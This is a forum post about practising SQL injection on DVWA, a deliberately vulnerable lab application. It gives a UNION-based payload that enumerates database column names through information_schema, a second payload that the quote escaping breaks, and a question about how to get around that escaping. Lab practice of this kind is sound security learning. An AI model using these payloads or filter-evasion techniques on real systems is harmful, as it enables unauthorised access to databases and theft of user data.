Jump to content

SQL Injection: How to use tick/quote when it's not possible?


w01f
 Share

Recommended Posts

I'll use DVWA in this example as the code is available for everyone.
Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in a class room environment.
You can get it here and set it up on your personal lab
Now I know that it's not possible to use tick/quote in SQL Injection Medium Level due to "mysql_real_escape_string()" PHP function.
mysql_real_escape_string() calls MySQL's library function mysql_real_escape_string, which prepends backslashes to the following characters: \x00, \n, \r, \, ', " and \x1a.
That's fine. I solved the Medium solution without using quote. It's easy because the number of data in DVWA is limited. But what happens when there's bigger data? Let me give an example.
I was able to enumerate ALL columns name from current database.
The problem is I wanted to get only column from table "users".
As you can see, the following command actually list out all columns from ALL tables including "users" and also "guestbook"
1 UNION SELECT NULL,CONCAT(column_name) FROM information_schema.columns WHERE table_schema=DATABASE()-- -
This is how it looks like when I selecting "table_schema,table_name,column_name" in MySQL.
 
mysql> SELECT table_schema,table_name,column_name FROM information_schema.columns WHERE table_schema=DATABASE();
+--------------+------------+-------------+
| table_schema | table_name | column_name |
+--------------+------------+-------------+
| dvwa | guestbook | comment_id |
| dvwa | guestbook | comment |
| dvwa | guestbook | name |
| dvwa | users | user_id |
| dvwa | users | first_name |
| dvwa | users | last_name |
| dvwa | users | user |
| dvwa | users | password |
| dvwa | users | avatar |
+--------------+------------+-------------+
9 rows in set (0.00 sec)
The only solution that I can think of at the moment is by limiting the output only for "users" table by using MySQL WHERE and AND clause.
However, tick is not allowed by "mysql_real_escape_string" function and this code will cause an error.
1 UNION SELECT NULL,CONCAT(column_name) FROM information_schema.columns WHERE table_schema=DATABASE() AND table_name='users'-- -
Error (which expected because of quote)
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'users\'-- -' at line 1
Is there a way to get around this? How do I use tick when it's not possible?
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...